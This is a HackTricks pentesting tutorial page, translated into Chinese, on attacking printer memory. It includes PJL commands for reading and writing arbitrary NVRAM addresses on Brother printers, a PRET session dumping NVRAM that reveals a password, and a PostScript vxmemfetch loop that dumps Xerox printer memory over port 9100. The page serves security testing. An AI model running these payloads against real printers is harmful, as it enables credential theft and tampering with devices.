hacktricks/network-services-pentesting/pentesting-printers/memory-access.md
2023-08-03 19:12:22 +00:00

4.5 KiB
Raw Blame History

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

您可以尝试转储 NVRAM 并从中提取机密信息(如密码)。

PJLBrother 中,您可以使用以下 PJL 访问任意 NVRAM 地址,如下所示:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

您可以使用PRET来测试此攻击:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

某些Xerox打印机型号内置了专有的PostScript vxmemfetch 运算符允许攻击者读取任意内存地址。使用PostScript循环可以轻松地使用此功能将整个内存转储如下所示PRET没有此攻击因此您需要将此有效负载发送到nc连接中的端口9100

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

更多信息请参考:http://hacking-printers.net/wiki/index.php/Memory_access

☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥